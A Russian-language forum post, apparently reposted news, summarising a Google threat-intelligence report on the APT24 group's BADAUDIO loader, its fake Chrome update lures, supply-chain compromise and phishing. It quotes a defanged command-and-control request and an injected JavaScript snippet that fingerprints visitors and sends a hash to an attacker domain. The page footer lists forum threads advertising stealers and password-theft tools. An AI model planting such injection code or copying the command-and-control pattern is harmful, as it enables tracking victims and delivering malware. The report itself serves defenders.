«Обновите Chrome для защиты» — самая опасная кнопка интернета.

Support81

Administrator
Как цифровая мафия грабила корпорации через поддельные апдейты.
apt24.jpg


Команда

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

представила подробный разбор многолетней кибершпионской кампании, связанной с группировкой APT24. По их данным, в течение 3 лет эта команда последовательно распространяет вредоносный загрузчик BADAUDIO, который применяется для закрепления в сетях жертв и дальнейшего развертывания инструментов удалённого управления.

За время наблюдений вектор распространения заметно усложнился. На ранних этапах злоумышленники опирались на массовый взлом легитимных сайтов, превращая их в площадки для установки вредоносного JavaScript. Позже схема расширилась: возникли поставочные атаки через тайваньскую маркетинговую компанию, а также серия фишинговых писем, направленных на конкретных сотрудников разных организаций.

BADAUDIO представляет собой загрузчик на C++, работающий в роли первой стадии. Он устанавливает сетевое соединение с сервером управления, собирает данные о системе и, используя встроенный ключ AES, шифрует эти сведения. После отправки зашифрованного блока в cookie-параметре загрузчик получает полезную нагрузку, расшифровывает её тем же ключом и выполняет в оперативной памяти. В одном из эпизодов такой нагрузкой оказался Cobalt Strike Beacon, однако специалисты подчёркивают, что его использование не является универсальным.

Пример запроса, приведённый GTIG:

GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1
Host: wispy[.]geneva[.]workers[.]dev
Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache


Вредонос также может использовать иной формат идентификатора, который вставляется в параметры запроса, чтобы операторы могли отслеживать конкретные заражённые узлы.

Код загрузчика заметно затрудняет анализ благодаря технике выпрямления управления. Эта схема разрушает обычную структуру программы и заменяет её набором разрозненных блоков, выполнение которых определяется центральным управляющим фрагментом. Из-за этого автоматический анализ и реверс-инжиниринг требуют значительно больше времени.

BADAUDIO чаще всего загружается как DLL через подмену порядка поиска библиотек по механизму DLL Search Order Hijacking (MITRE ATT&CK T1574.001). В свежих образцах вредоносная библиотека упакована в зашифрованный архив вместе с BAT, VBS и LNK-файлами, которые автоматизируют копирование легитимного EXE и DLL в пользовательские каталоги, создают запись автозапуска и запускают нелегитимную библиотеку через сайдлоадинг. Такой подход уменьшает количество очевидных признаков компрометации.

Google подтвердила, что в одном из случаев полезная нагрузка представляла собой

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. В конфигурации маяка нашли watermark, ранее встречавшийся в другой кампании APT24. Это значение формируется на основе файла CobaltStrike.auth и позволяет связывать разные инциденты с одной сборкой инструмента.

Кампания развивается уже несколько лет и включает комбинацию методов: взлом сайтов, поставочные атаки и целевые фишинговые письма. Каждая из веток использует собственную систему фильтрации жертв и проверки окружения.

Первое массовое использование BADAUDIO через взломанные сайты Google зафиксировала в ноябре 2022 года. Было обнаружено свыше 20 ресурсов разной тематики. Во все сайты внедряли модифицированный

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, который включал этап фильтрации по операционной системе и браузеру. В результате цепочка активировалась только для Windows.

Фрагмент JavaScript из отчета GTIG:

$(window).ready(function() {
var userAgent = navigator.userAgent;
var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;
var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;
var isMac = userAgent.indexOf('Macintosh') > -1;
var isiPhone = userAgent.indexOf('iPhone') > -1;
var isFireFox = userAgent.indexOf('Firefox') > -1;
if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) {
var tag_script = document.createElement("script");
tag_script.type = "text/javascript";
tag_script.src = "

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

";
tag_script.onload = "initFingerprintJS()";
document.body.appendChild(tag_script);
if (typeof(callback) !== "undefined") {
tag_script.onload = function() {
callback();
};
}
function callback() {
var option = {
excludes: {
screenResolution: true,
availableScreenResolution: true,
enumerateDevices: true
}
};
new Fingerprint2.get(option, function(components) {
var values = components.map(function(component) {
return component.value;
});
var murmur = Fingerprint2.x64hash128(values.join(''), 31);
var script_tag = document.createElement("script");
script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);
document.body.appendChild(script_tag);
});
}
}
});


Скрипт собирал характеристики браузера и вычислял хеш по алгоритму MurmurHash3, после чего отправлял идентификатор на домен злоумышленников. Если параметры подходили под требования, пользователь видел ложное окно «обновления» Chrome, предлагавшее загрузить BADAUDIO.

В июле 2024 года APT24 взломала региональную фирму, поставлявшую JavaScript-библиотеки для анализа трафика и вспомогательных функций веб-сайтов. Этот взлом затронул свыше 1000 доменов. Причём в течение года компания пережила несколько повторных компрометаций, что демонстрирует упорство операторов.

В первой версии вредоносный код внедрили в популярную библиотеку с использованием домена-опечатки, имитирующего ресурс CDN (MITRE ATT&CK T1195.001). В другом случае злоумышленники спрятали обфусцированный JavaScript внутри JSON-файла, который затем подгружался и выполнялся через скомпрометированный скрипт. Это позволяло скрывать вредоносный код в файле, который обычно не воспринимается как исполняемый.

Библиотека FingerprintJS2 снова генерировала x64hash128-отпечатки устройств (MITRE ATT&CK T1082). Далее происходила отправка данных методом POST в Base64 (MITRE ATT&CK T1041). Команда управления выдавала ссылку на следующий фрагмент цепочки, который перенаправлял пользователя на страницу загрузки BADAUDIO (MITRE ATT&CK T1105).

Кроме атак через сайты APT24 проводила

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, используя письма от имени благотворительной организации. В других эпизодах злоумышленники распространяли зашифрованные архивы через Google Drive и OneDrive. Почтовая фильтрация Google автоматически отправляла такие письма в раздел «Спам» и тем самым снижала результативность рассылок. Для отслеживания реакции людей злоумышленники встраивали пиксель-трекинг.

Google включила задействованные домены, сайты и файлы в блок-лист Safe Browsing, что защищает пользователей браузеров, использующих эту инфраструктуру. Компания также отправила уведомления пострадавшим организациям, предоставив технические детали и рекомендации по устранению последствий.

В конце отчета приведены индикаторы компрометации: контрольные суммы JavaScript-файлов, хэши бинарников BADAUDIO, адреса серверов управления, домены промежуточной инфраструктуры и watermark Cobalt Strike Beacon. Дополнительно опубликованы YARA-правила, предназначенные для поиска разных версий загрузчика.
Подробнее:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 
Последнее редактирование:
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Срочно обновите Chrome: новый 0day раскрывает конфиденциальные данные Новости в сети 0
Support81 У вас роутер ASUS и используете VPN? Обновите прошивку 1.1.2.3_1010 — 3 модели пускают хакеров без пароля Новости в сети 0
Support81 Призрак в системе: Snake Keylogger опустошает Chrome, Edge и Firefox Новости в сети 0
Support81 Chrome, Firefox и Edge: как Flesh Stealer стал ночным кошмаром для браузеров Новости в сети 0
Support81 0Day в Chrome опустошает криптокошельки по всему миру Новости в сети 0
Support81 0day-эксплойт для Chrome выставлен на продажу за $1 000 000 Новости в сети 0
El_IRBIS Интересно Отключаем Google Ad Topics в Chrome: Шаг за шагом инструкция с практическим применением. Анонимность и приватность 0
E Microsoft Defender ATP принял обновление для Chrome за троянское ПО Новости в сети 1
G Интересно [Chrome] режим Инкогнито по ярлыку в Windows. Анонимность и приватность 0
S Echelon Stealer v6.2.5 + Clipper +Chrome(v80) - source c отправкой на MEGA ! Вирусология 12
Z Интересно Chrome Flags: Security Tools Анонимность и приватность 0
S Команда Chrome работает над новой функцией Новости в сети 0
M Darknet на базе Chrome Анонимность и приватность 14
B Google объявила, что Chrome будет помечать быстрые и медленные сайты Новости в сети 2
M NoScript для Chrome Анонимность и приватность 0
M Бесплатный VPN для Google Chrome Анонимность и приватность 0
A Стиллер паролей для Chrome и Firefox Уязвимости и взлом 0
A Google chrome будет блокировать слишком тяжёлую рекламу Новости в сети 0
M Продам Google Chrome расширение. Смена IP. Доступ к заблокированным сайтам Все что не подошло по разделу 0
G Отключение сервиса слежки и сканирования в Google Chrome Полезные статьи 0
G Воруем пароли из Google Chrome Полезные статьи 1
Admin Полезные плагины для Google Chrome Полезные статьи 0
A Chrome Cookies Read C# Программирование 1
E Скрипт полной блокировки Google Chrome hack Полезные статьи 5
Support81 Этичный хакинг? Забудьте. США готовят рои ИИ-агентов для атаки на Китай Новости в сети 0
Support81 $244000000 за шифрование. VPN-инфраструктура теперь — бесплатный банкомат для хакеров Новости в сети 0
Support81 200000 постов за год: кипрская ботоферма круглосуточно печатает дипломы для всей России Новости в сети 0
Support81 Брак программиста длится годы. Женщины-шпионы ведут «сексуальную войну» для кражи его секретов Новости в сети 0
onlydockyc Продам Файлы PDF шаблонов для подтверждения адреса проживания Все что не подошло по разделу 0
onlydockyc Могу помочь вам своим небольшим опытом. Сделаю для вас фотомонтаж, отрисовку или подобные работы в photoshop. Раздачи и сливы 0
Support81 Ваш телефон — их радар. Altamides создала глобальную систему слежки в 160 странах, невидимую для спецслужб Новости в сети 0
Support81 С виду — офис инвестиционной компании. На деле — 80 мошенников с 204 мониторами для обмана жертв Новости в сети 0
Support81 Не Таиланд, а рабство в Мьянме: как туристический рай стал перевалочной базой для похитителей россиян Новости в сети 0
Support81 ФБР заблокировало портал BreachForums, использовавшийся для вымогательства у Salesforce Новости в сети 0
Support81 Россия — цель №1 для хакеров. На страну приходится до 72% всех кибератак в СНГ. Новости в сети 0
Support81 Новая тактика «Призрачных звонков» использует Zoom и Microsoft Teams для операций C2 Новости в сети 0
wrangler65 Как стать хакером для «самых маленьких» Ч.2 Полезные статьи 0
wrangler65 Как стать хакером для «самых маленьких» Ч.1 Полезные статьи 0
Support81 Storm-2603 использует бэкдор, контролируемый DNS, для атак программ-вымогателей Warlock и LockBit Новости в сети 0
Support81 Операторы LockBit используют скрытую технику загрузки DLL для загрузки вредоносного приложения Новости в сети 0
Support81 Как война в Украине стала полигоном для наркокартелей Новости в сети 0
Support81 Вредоносное ПО Lumma для кражи информации возвращается после вмешательства правоохранительных органов Новости в сети 0
turbion0 Мошенники создали фальшивые страницы для продажи авиабилетов в Геленджик Новости в сети 0
Support81 Вирус-вымогатель Interlock использует метод FileFix для доставки вредоносного ПО Новости в сети 0
Support81 Великобритания запускает программу исследования уязвимостей для внешних экспертов Новости в сети 0
Support81 Идеальное оружие для киберпреступников: нейросети заставляют вас самих кликать на фишинговые ловушки Новости в сети 0
Support81 Легенду превратили в ловушку: имя Флибусты — теперь приманка для жертв Новости в сети 0
Support81 Шпион из ЦРУ превратил Telegram в площадку для государственной тайны Новости в сети 0
Support81 SMS для Google и Meta? Перешлём через Намибию, Чечню и швейцарский гараж Новости в сети 0
wrangler65 Katz Stealer: новая опасная малварь для кражи данных с функциями скрытности и модульности Новости в сети 0

Название темы